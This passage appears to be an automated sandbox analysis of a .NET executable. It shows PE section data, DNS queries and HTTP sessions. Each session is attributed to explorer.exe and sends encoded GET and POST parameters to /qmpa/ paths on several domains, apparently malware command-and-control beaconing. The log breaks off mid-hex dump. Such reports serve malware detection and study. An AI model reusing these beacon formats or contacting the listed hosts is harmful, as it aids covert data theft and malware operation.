                                                                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                  .text0x20000xac2440xac400False0.7428536601959361data7.366462470507414IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                  .rsrc0xb00000x3a80x400False0.373046875data2.9290447848695855IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                  .reloc0xb20000xc0x200False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                  NameRVASizeTypeLanguageCountry
                                                                  RT_VERSION0xb00580x34cdata
                                                                  DLLImport
                                                                  mscoree.dll_CorExeMain
                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Nov 21, 2022 10:59:14.347834110 CET4971580192.168.2.7141.136.43.229
                                                                  Nov 21, 2022 10:59:14.384463072 CET8049715141.136.43.229192.168.2.7
                                                                  Nov 21, 2022 10:59:14.384608030 CET4971580192.168.2.7141.136.43.229
                                                                  Nov 21, 2022 10:59:14.384761095 CET4971580192.168.2.7141.136.43.229
                                                                  Nov 21, 2022 10:59:14.421220064 CET8049715141.136.43.229192.168.2.7
                                                                  Nov 21, 2022 10:59:14.421303034 CET8049715141.136.43.229192.168.2.7
                                                                  Nov 21, 2022 10:59:14.421327114 CET8049715141.136.43.229192.168.2.7
                                                                  Nov 21, 2022 10:59:14.421550989 CET4971580192.168.2.7141.136.43.229
                                                                  Nov 21, 2022 10:59:14.421689034 CET8049715141.136.43.229192.168.2.7
                                                                  Nov 21, 2022 10:59:14.421760082 CET4971580192.168.2.7141.136.43.229
                                                                  Nov 21, 2022 10:59:14.431624889 CET4971580192.168.2.7141.136.43.229
                                                                  Nov 21, 2022 10:59:14.468337059 CET8049715141.136.43.229192.168.2.7
                                                                  Nov 21, 2022 10:59:24.634249926 CET4971780192.168.2.738.239.92.131
                                                                  Nov 21, 2022 10:59:24.892251015 CET804971738.239.92.131192.168.2.7
                                                                  Nov 21, 2022 10:59:24.892396927 CET4971780192.168.2.738.239.92.131
                                                                  Nov 21, 2022 10:59:24.892654896 CET4971780192.168.2.738.239.92.131
                                                                  Nov 21, 2022 10:59:25.151921988 CET804971738.239.92.131192.168.2.7
                                                                  Nov 21, 2022 10:59:25.156493902 CET804971738.239.92.131192.168.2.7
                                                                  Nov 21, 2022 10:59:25.156529903 CET804971738.239.92.131192.168.2.7
                                                                  Nov 21, 2022 10:59:25.156629086 CET4971780192.168.2.738.239.92.131
                                                                  Nov 21, 2022 10:59:25.905796051 CET4971780192.168.2.738.239.92.131
                                                                  Nov 21, 2022 10:59:26.922000885 CET4971880192.168.2.738.239.92.131
                                                                  Nov 21, 2022 10:59:27.186328888 CET804971838.239.92.131192.168.2.7
                                                                  Nov 21, 2022 10:59:27.186903000 CET4971880192.168.2.738.239.92.131
                                                                  Nov 21, 2022 10:59:27.341429949 CET4971880192.168.2.738.239.92.131
                                                                  Nov 21, 2022 10:59:27.605669975 CET804971838.239.92.131192.168.2.7
                                                                  Nov 21, 2022 10:59:27.609421968 CET804971838.239.92.131192.168.2.7
                                                                  Nov 21, 2022 10:59:27.609448910 CET804971838.239.92.131192.168.2.7
                                                                  Nov 21, 2022 10:59:27.609464884 CET804971838.239.92.131192.168.2.7
                                                                  Nov 21, 2022 10:59:27.609689951 CET4971880192.168.2.738.239.92.131
                                                                  Nov 21, 2022 10:59:27.630934000 CET4971880192.168.2.738.239.92.131
                                                                  Nov 21, 2022 10:59:27.895652056 CET804971838.239.92.131192.168.2.7
                                                                  Nov 21, 2022 10:59:32.878143072 CET4971980192.168.2.7103.11.189.189
                                                                  Nov 21, 2022 10:59:33.058696032 CET8049719103.11.189.189192.168.2.7
                                                                  Nov 21, 2022 10:59:33.058909893 CET4971980192.168.2.7103.11.189.189
                                                                  Nov 21, 2022 10:59:33.059086084 CET4971980192.168.2.7103.11.189.189
                                                                  Nov 21, 2022 10:59:33.239476919 CET8049719103.11.189.189192.168.2.7
                                                                  Nov 21, 2022 10:59:33.240129948 CET8049719103.11.189.189192.168.2.7
                                                                  Nov 21, 2022 10:59:33.240156889 CET8049719103.11.189.189192.168.2.7
                                                                  Nov 21, 2022 10:59:33.240179062 CET8049719103.11.189.189192.168.2.7
                                                                  Nov 21, 2022 10:59:33.240223885 CET4971980192.168.2.7103.11.189.189
                                                                  Nov 21, 2022 10:59:33.240307093 CET4971980192.168.2.7103.11.189.189
                                                                  Nov 21, 2022 10:59:34.064301968 CET4971980192.168.2.7103.11.189.189
                                                                  Nov 21, 2022 10:59:35.086605072 CET4972080192.168.2.7103.11.189.189
                                                                  Nov 21, 2022 10:59:35.275827885 CET8049720103.11.189.189192.168.2.7
                                                                  Nov 21, 2022 10:59:35.276731014 CET4972080192.168.2.7103.11.189.189
                                                                  Nov 21, 2022 10:59:35.276971102 CET4972080192.168.2.7103.11.189.189
                                                                  Nov 21, 2022 10:59:35.465966940 CET8049720103.11.189.189192.168.2.7
                                                                  Nov 21, 2022 10:59:35.466799021 CET8049720103.11.189.189192.168.2.7
                                                                  Nov 21, 2022 10:59:35.466834068 CET8049720103.11.189.189192.168.2.7
                                                                  Nov 21, 2022 10:59:35.466861963 CET8049720103.11.189.189192.168.2.7
                                                                  Nov 21, 2022 10:59:35.467226028 CET4972080192.168.2.7103.11.189.189
                                                                  Nov 21, 2022 10:59:35.467616081 CET4972080192.168.2.7103.11.189.189
                                                                  Nov 21, 2022 10:59:35.656687021 CET8049720103.11.189.189192.168.2.7
                                                                  Nov 21, 2022 10:59:40.616393089 CET4972180192.168.2.768.66.216.12
                                                                  Nov 21, 2022 10:59:40.741341114 CET804972168.66.216.12192.168.2.7
                                                                  Nov 21, 2022 10:59:40.741513968 CET4972180192.168.2.768.66.216.12
                                                                  Nov 21, 2022 10:59:40.741662979 CET4972180192.168.2.768.66.216.12
                                                                  Nov 21, 2022 10:59:40.866437912 CET804972168.66.216.12192.168.2.7
                                                                  Nov 21, 2022 10:59:40.866710901 CET804972168.66.216.12192.168.2.7
                                                                  Nov 21, 2022 10:59:40.866746902 CET804972168.66.216.12192.168.2.7
                                                                  Nov 21, 2022 10:59:40.866955042 CET4972180192.168.2.768.66.216.12
                                                                  Nov 21, 2022 10:59:41.750870943 CET4972180192.168.2.768.66.216.12
                                                                  Nov 21, 2022 10:59:42.766480923 CET4972280192.168.2.768.66.216.12
                                                                  Nov 21, 2022 10:59:42.892333984 CET804972268.66.216.12192.168.2.7
                                                                  Nov 21, 2022 10:59:42.892477989 CET4972280192.168.2.768.66.216.12
                                                                  Nov 21, 2022 10:59:42.892518044 CET4972280192.168.2.768.66.216.12
                                                                  Nov 21, 2022 10:59:43.017298937 CET804972268.66.216.12192.168.2.7
                                                                  Nov 21, 2022 10:59:43.017709970 CET804972268.66.216.12192.168.2.7
                                                                  Nov 21, 2022 10:59:43.017731905 CET804972268.66.216.12192.168.2.7
                                                                  Nov 21, 2022 10:59:43.017868996 CET4972280192.168.2.768.66.216.12
                                                                  Nov 21, 2022 10:59:43.017957926 CET4972280192.168.2.768.66.216.12
                                                                  Nov 21, 2022 10:59:43.143034935 CET804972268.66.216.12192.168.2.7
                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Nov 21, 2022 10:59:14.285629988 CET5333653192.168.2.78.8.8.8
                                                                  Nov 21, 2022 10:59:14.321193933 CET53533368.8.8.8192.168.2.7
                                                                  Nov 21, 2022 10:59:24.461070061 CET5051353192.168.2.78.8.8.8
                                                                  Nov 21, 2022 10:59:24.631153107 CET53505138.8.8.8192.168.2.7
                                                                  Nov 21, 2022 10:59:32.684686899 CET6076553192.168.2.78.8.8.8
                                                                  Nov 21, 2022 10:59:32.876728058 CET53607658.8.8.8192.168.2.7
                                                                  Nov 21, 2022 10:59:40.479095936 CET5828353192.168.2.78.8.8.8
                                                                  Nov 21, 2022 10:59:40.615113974 CET53582838.8.8.8192.168.2.7
                                                                  Nov 21, 2022 10:59:48.034303904 CET5002453192.168.2.78.8.8.8
                                                                  Nov 21, 2022 10:59:48.164165974 CET53500248.8.8.8192.168.2.7
                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                  Nov 21, 2022 10:59:14.285629988 CET192.168.2.78.8.8.80xdef2Standard query (0)www.notarpucarhr.comA (IP address)IN (0x0001)false
                                                                  Nov 21, 2022 10:59:24.461070061 CET192.168.2.78.8.8.80x2a9aStandard query (0)www.multimediapages.comA (IP address)IN (0x0001)false
                                                                  Nov 21, 2022 10:59:32.684686899 CET192.168.2.78.8.8.80x7c93Standard query (0)www.oaksinstitute.netA (IP address)IN (0x0001)false
                                                                  Nov 21, 2022 10:59:40.479095936 CET192.168.2.78.8.8.80xbfc1Standard query (0)www.thetrendsinfo.comA (IP address)IN (0x0001)false
                                                                  Nov 21, 2022 10:59:48.034303904 CET192.168.2.78.8.8.80x1771Standard query (0)www.emiliayenrique.comA (IP address)IN (0x0001)false
                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                  Nov 21, 2022 10:59:14.321193933 CET8.8.8.8192.168.2.70xdef2No error (0)www.notarpucarhr.comnotarpucarhr.comCNAME (Canonical name)IN (0x0001)false
                                                                  Nov 21, 2022 10:59:14.321193933 CET8.8.8.8192.168.2.70xdef2No error (0)notarpucarhr.com141.136.43.229A (IP address)IN (0x0001)false
                                                                  Nov 21, 2022 10:59:24.631153107 CET8.8.8.8192.168.2.70x2a9aNo error (0)www.multimediapages.com38.239.92.131A (IP address)IN (0x0001)false
                                                                  Nov 21, 2022 10:59:32.876728058 CET8.8.8.8192.168.2.70x7c93No error (0)www.oaksinstitute.net103.11.189.189A (IP address)IN (0x0001)false
                                                                  Nov 21, 2022 10:59:40.615113974 CET8.8.8.8192.168.2.70xbfc1No error (0)www.thetrendsinfo.comthetrendsinfo.comCNAME (Canonical name)IN (0x0001)false
                                                                  Nov 21, 2022 10:59:40.615113974 CET8.8.8.8192.168.2.70xbfc1No error (0)thetrendsinfo.com68.66.216.12A (IP address)IN (0x0001)false
                                                                  Nov 21, 2022 10:59:48.164165974 CET8.8.8.8192.168.2.70x1771No error (0)www.emiliayenrique.comproxy.wws.theknot.comCNAME (Canonical name)IN (0x0001)false
                                                                  Nov 21, 2022 10:59:48.164165974 CET8.8.8.8192.168.2.70x1771No error (0)proxy.wws.theknot.comwws-proxy-prod-linux2.us-east-1.elasticbeanstalk.comCNAME (Canonical name)IN (0x0001)false
                                                                  Nov 21, 2022 10:59:48.164165974 CET8.8.8.8192.168.2.70x1771No error (0)wws-proxy-prod-linux2.us-east-1.elasticbeanstalk.com3.209.28.237A (IP address)IN (0x0001)false
                                                                  Nov 21, 2022 10:59:48.164165974 CET8.8.8.8192.168.2.70x1771No error (0)wws-proxy-prod-linux2.us-east-1.elasticbeanstalk.com52.20.53.66A (IP address)IN (0x0001)false
                                                                  • www.notarpucarhr.com
                                                                  • www.multimediapages.com
                                                                  • www.oaksinstitute.net
                                                                  • www.thetrendsinfo.com
                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  0192.168.2.749715141.136.43.22980C:\Windows\explorer.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Nov 21, 2022 10:59:14.384761095 CET131OUTGET /qmpa/?3f-T6nI=EgIWtG18ZIzAqtaO1OmvkFLdPjhKt8Mp7J5Y1fxWkEB6Q9kPLkR881s923Q+G4W9S+aNob6MQv0YuDJ73eh9wGmaMy0jmQVwd4+wO+lCGFJf&j6=hfNT HTTP/1.1
                                                                  Host: www.notarpucarhr.com
                                                                  Connection: close
                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                  Data Ascii:
                                                                  Nov 21, 2022 10:59:14.421303034 CET132INHTTP/1.1 404 Not Found
                                                                  Connection: close
                                                                  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                  pragma: no-cache
                                                                  content-type: text/html
                                                                  content-length: 1238
                                                                  date: Mon, 21 Nov 2022 09:59:14 GMT
                                                                  server: LiteSpeed
                                                                  x-xss-protection: 1; mode=block
                                                                  x-content-type-options: nosniff
                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 20 3c 61 20 73 74 79 6c
                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by <a styl
                                                                  Nov 21, 2022 10:59:14.421327114 CET132INData Raw: 65 3d 22 63 6f 6c 6f 72 3a 23 66 66 66 3b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6c 69 74 65 73 70 65 65 64 74 65 63 68 2e 63 6f 6d 2f 65 72 72 6f 72 2d 70 61 67 65 22 3e 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65
                                                                  Data Ascii: e="color:#fff;" href="http://www.litespeedtech.com/error-page">LiteSpeed Web Server</a><p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  1192.168.2.74971738.239.92.13180C:\Windows\explorer.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Nov 21, 2022 10:59:24.892654896 CET141OUTPOST /qmpa/ HTTP/1.1
                                                                  Host: www.multimediapages.com
                                                                  Connection: close
                                                                  Content-Length: 193
                                                                  Cache-Control: no-cache
                                                                  Origin: http://www.multimediapages.com
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Accept: */*
                                                                  Referer: http://www.multimediapages.com/qmpa/
                                                                  Accept-Language: en-US
                                                                  Accept-Encoding: gzip, deflate
                                                                  Data Raw: 33 66 2d 54 36 6e 49 3d 6d 63 4c 7a 7a 6c 6c 51 57 77 75 6a 4d 66 4c 6f 52 70 77 35 65 38 31 69 78 38 6d 58 62 51 5a 4c 73 6e 4b 42 38 44 67 6b 55 49 61 68 7a 49 4e 62 6e 6d 30 59 79 36 4e 37 54 33 76 33 72 6d 6a 76 4f 51 46 68 31 6d 33 6f 76 73 4f 62 52 57 69 70 78 6d 37 42 4a 65 6d 4c 79 44 61 4f 34 47 6a 5a 70 43 75 66 75 35 76 6e 6c 6f 37 78 30 70 79 2d 46 48 63 41 49 30 37 47 71 70 72 4a 54 36 4c 38 55 5f 45 6e 51 5f 28 48 66 38 64 59 50 71 62 30 78 31 7e 62 55 79 6f 4b 33 4e 37 6e 65 30 72 50 57 41 61 34 45 39 45 35 36 6c 7a 70 49 7a 55 4d 76 42 77 70 39 4e 63 2e 00 00 00 00 00 00 00 00
                                                                  Data Ascii: 3f-T6nI=mcLzzllQWwujMfLoRpw5e81ix8mXbQZLsnKB8DgkUIahzINbnm0Yy6N7T3v3rmjvOQFh1m3ovsObRWipxm7BJemLyDaO4GjZpCufu5vnlo7x0py-FHcAI07GqprJT6L8U_EnQ_(Hf8dYPqb0x1~bUyoK3N7ne0rPWAa4E9E56lzpIzUMvBwp9Nc.
                                                                  Nov 21, 2022 10:59:25.156493902 CET142INHTTP/1.1 403 Forbidden
                                                                  Server: nginx
                                                                  Date: Mon, 21 Nov 2022 09:59:25 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Vary: Accept-Encoding
                                                                  Content-Encoding: gzip
                                                                  Data Raw: 33 63 63 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 54 5b 6f 1a 47 14 7e f7 af 98 ee 93 fd 00 03 8e 23 b9 74 d9 0a 1b 24 23 d9 8d 9b 90 56 7e 24 5c cc b6 c0 a2 65 12 5a 45 91 c0 89 0b 98 8b 89 8d 9d d8 59 9a d8 b2 1b d7 4e 16 47 69 31 e1 52 ff 97 64 67 76 79 f2 5f e8 59 96 52 b9 aa f2 b0 b3 3b 73 ce 9c ef 9c ef 3b 67 f9 2f bc b7 e6 03 2b cb 3e b4 10 58 5a 44 cb 77 e7 16 fd f3 88 b3 61 fc fd 8d 79 8c bd 01 af 65 98 b1 3b 9c 18 fb be e1 10 17 23 24 e5 c2 38 93 c9 d8 33 37 ec 92 bc 8a 03 b7 71 8c 24 e2 33 38 4d 64 31 44 ec 61 12 e6 84 09 de 8c 28 f0 0b 3e 8f 57 e0 03 fe c0 a2 4f 60 6b 27 4c 39 35 0e cf 58 b5 c0 1a 8f d9 cb 63 5d 29 19 cd e3 c1 c1 9f 3c b6 5c 26 f8 25 5f c0 03 a0 81 65 9b ef db bb fe ef dc dc bc 94 24 91 24 b1 05 7e 4e 45 38 34 da b9 39 12 f9 89 0c 71 bf 42 a1 58 50 4e 47 88 fb 3e 89 da 66 4d e8 3b 81 95 45 1f 22 70 61 e4 17 4a a7 e1 1c a1 b9 5b de 15 f4 10 45 21 a4 0b 7d 99 22 d8 39 9d 22 88 aa 25 ad bf 8d 1e 81 c3 82 73 6c 36 4d d8 79 f3 3f f6 e9 cf 5e f7 b8 e2 62 f2 47 70 09 49 71 49 76 21 39 12 1e 86 f5 b8 1e 88 69 91 c0 6e 6c 4a 04 65 49 4a 82 95 c7 c3 74 21 6d 6c 91 65 26 09 94 79 e6 a0 86 8c 18 26 31 f7 4d 87 03 dd 93 e4 70 44 76 3b 50 28 12 8f a7 53 c1 90 98 5c 75 3b 1d e0 78 1b 1e 2f 5c 8f 39 3f cf 30 d8 27 40 02 ad 5d a1 eb 17 f4 28 af f5 2f f5 fa 09 2b 66 d9 66 4d fb eb 85 be ff 84 e6 df b2 8a 3a d6 45 7f a1 d2 fe 0e 2b ec 82 40 60 05 c9 06 7b b5 4f d9 35 80 92 01 2f 25 18 cd 0b 7a de 30 9a 3b 5a f7 58 6b 97 d8 76 45 eb 2b 57 bd 7d 1e a7 c0 7e 3f 0e 4b 5c 14 e8 6f 6b ec 57 05 90 0d f5 48 6b 77 8c fc 29 bd 78 47 3b 75 50 de 78 dc a7 47 2f ff 17 70 d0 38 bc ea 95 01 41 6b 57 f5 fe 53 fd 6c 4f 57 0f f4 da 2f f4 e9 73 23 57 d7 df 77 21 11 1e 43 78 0b a3 b2 43 f3 5d 3e 88 62 72 24 ea e6 7e 08 3e 08 a6 43 b2 98 22 ae b8 14 0a 12 51 4a da e5 48 5c 0a 86 27 a7 38 81 16 2e d8 ee 39 8f 83 02 2b 17 07 5b 2a e0 d0 0f 2d 8b 0e ba de d2 ba bb 16 11 83 7c 05 6a fb 17 07 0f 2b 8a 4d 0b 66 7b a2 41 7d cf 68 36 d1 8c c3 69 77 22 1b 82 ce d6 bb 9b 56 67 03 05 86 7a 39 78 a6 ea f5 77 5a a7 3a a2 f5 d9 2b b6 53 30 bb bf b4 a5 77 1b 66 d8 7b b2 e0 87 e6 96 93 11 82 b4 cb 03 96 6b 32 a5 42 37 0e d0 a4 df 7f 67 8a c7 00 35 e6 9a 6d 64 99 d2 b4 bc ae 7a 05 20 d2 3a 61 f5 26 2b e7 b4 4e 07 88 b1 84 bc ea 15 af 0b 60 f4 df d0 c2 39 1a b3 33 1a e1 55 c9 9e 10 43 b2 94 96 a2 c4 1e 92 12 38 9a 31 bb 17 7f 6d ae 62 d8 3d eb 9c 75 70 c2 d2 3f 2e 48 eb bc a6 db 39 0b cf ca d3 a4 10 98 63 35 45 ff e3 90 96 d7 59 e9 cd c7 ac 62 b2 f3 31 db a0 5b 65 d8 00 3d f0 6d 76 cf ab fc e0 f0 f9 35 d1 58 71 9b f6 b2 e0 04 d5 22 da 56 e9 c6 ef e0 0b c5 d1 cd 26 55 4e 90 79 3c 12 7d ef 04 4d 8a 40 53 62 55 9e 42 5a fb ad 45 2f 54 0a da e9 4f 5a b4 56 b5 92 b0 50 80 1c 88 6a 74 ce b4 6e 7f 70 0a 4d 94 83 b8 9f b2 b0 2a d6 45 56 7d 4d 0b ad 71 92 74 fd 3d c8 64 36 a6 ba af 7d 28 5a ca b2 56 01 04 b1 92 d7 da dd 6b c9 0f 3b 01 06 16 e6 0e 16 18 40 3c 1c 57 78 5b c3 8b 87 3f bf 89 bf 01 aa 73 b5 6f 5f 05 00 00 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 3cc}T[oG~#t$#V~$\eZEYNGi1Rdgvy_YR;s;g/+>XZDwaye;#$837q$38Md1Da(>WO`k'L95Xc])<\&%_e$$~NE849qBXPNG>fM;E"paJ[E!}"9"%sl6My?^bGpIqIv!9inlJeIJt!mle&y&1MpDv;P(S\u;x/\9?0'@](/+ffM:E+@`{O5/%z0;ZXkvE+W}~?K\okWHkw)xG;uPxG/p8AkWSlOW/s#Ww!CxC]>br$~>C"QJH\'8.9+[*-|j+Mf{A}h6iw"Vgz9xwZ:+S0wf{k2B7g5mdz :a&+N`93UC81mb=up?.H9c5EYb1[e=mv5Xq"V&UNy<}M@SbUBZE/TOZVPjtnpM*EV}Mqt=d6}(ZVk;@<Wx[?so_0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  2192.168.2.74971838.239.92.13180C:\Windows\explorer.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Nov 21, 2022 10:59:27.341429949 CET143OUTGET /qmpa/?3f-T6nI=rejTwVtqfB30O9nwV+ATTccd4/r3ZShDvm2ExT48d5W41t5gt2xe96xDcyDktEvrNydQ6GKmhPSZbQq/61fgMLb8wiC572LGglGnkN+mkNWG&j6=hfNT HTTP/1.1
                                                                  Host: www.multimediapages.com
                                                                  Connection: close
                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                  Data Ascii:
                                                                  Nov 21, 2022 10:59:27.609421968 CET144INHTTP/1.1 403 Forbidden
                                                                  Server: nginx
                                                                  Date: Mon, 21 Nov 2022 09:59:27 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Vary: Accept-Encoding
                                                                  Data Raw: 35 35 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e e6 82 a8 e6 9c aa e8 a2 ab e6 8e 88 e6 9d 83 e6 9f a5 e7 9c 8b e8 af a5 e9 a1 b5 3c 2f 54 49 54 4c 45 3e 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 53 54 59 4c 45 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 42 4f 44 59 20 7b 20 66 6f 6e 74 3a 20 39 70 74 2f 31 32 70 74 20 e5 ae 8b e4 bd 93 20 7d 0a 20 20 48 31 20 7b 20 66 6f 6e 74 3a 20 31 32 70 74 2f 31 35 70 74 20 e5 ae 8b e4 bd 93 20 7d 0a 20 20 48 32 20 7b 20 66 6f 6e 74 3a 20 39 70 74 2f 31 32 70 74 20 e5 ae 8b e4 bd 93 20 7d 0a 20 20 41 3a 6c 69 6e 6b 20 7b 20 63 6f 6c 6f 72 3a 20 72 65 64 20 7d 0a 20 20 41 3a 76 69 73 69 74 65 64 20 7b 20 63 6f 6c 6f 72 3a 20 6d 61 72 6f 6f 6e 20 7d 0a 3c 2f 53 54 59 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 3c 54 41 42 4c 45 20 77 69 64 74 68 3d 35 30 30 20 62 6f 72 64 65 72 3d 30 20 63 65 6c 6c 73 70 61 63 69 6e 67 3d 31 30 3e 3c 54 52 3e 3c 54 44 3e 0a 3c 68 31 3e e6 82 a8 e6 9c aa e8 a2 ab e6 8e 88 e6 9d 83 e6 9f a5 e7 9c 8b e8 af a5 e9 a1 b5 3c 2f 68 31 3e 0a e6 82 a8 e4 b8 8d e5 85 b7 e5 a4 87 e4 bd bf e7 94 a8 e6 89 80 e6 8f 90 e4 be 9b e7 9a 84 e5 87 ad 